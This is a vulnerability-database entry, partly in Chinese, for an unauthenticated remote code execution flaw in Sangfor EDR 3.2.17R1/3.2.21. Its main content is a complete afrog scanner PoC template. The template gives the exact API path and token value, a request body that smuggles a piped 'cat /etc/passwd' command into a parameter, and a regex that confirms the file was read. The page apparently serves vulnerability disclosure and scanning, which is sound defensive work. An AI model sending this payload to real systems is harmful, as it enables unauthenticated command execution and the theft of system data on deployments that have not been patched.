sangfor-edr-cssp-rce: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution

日期: 2025-09-01 | 影响软件: Sangfor EDR | POC: 已公开

漏洞描述

Sangfor EDR 3.2.17R1/3.2.21 allows remote unauthenticated users to to execute arbitrary commands. app="sangfor"

PoC代码[已公开]

id: sangfor-edr-cssp-rce

info:
    name: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution
    author: pikpikcu
    severity: critical
    verified: false
    description: |
        Sangfor EDR 3.2.17R1/3.2.21 allows remote unauthenticated users to to execute arbitrary commands.
        app="sangfor"
    reference:
        - https://www.cnblogs.com/0day-li/p/13650452.html

rules:
    r0:
        request:
            method: POST
            path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
            body: |
                {"params":"w=123\"'1234123'\"|cat /etc/passwd"}
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/sangfor-edr-cssp-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐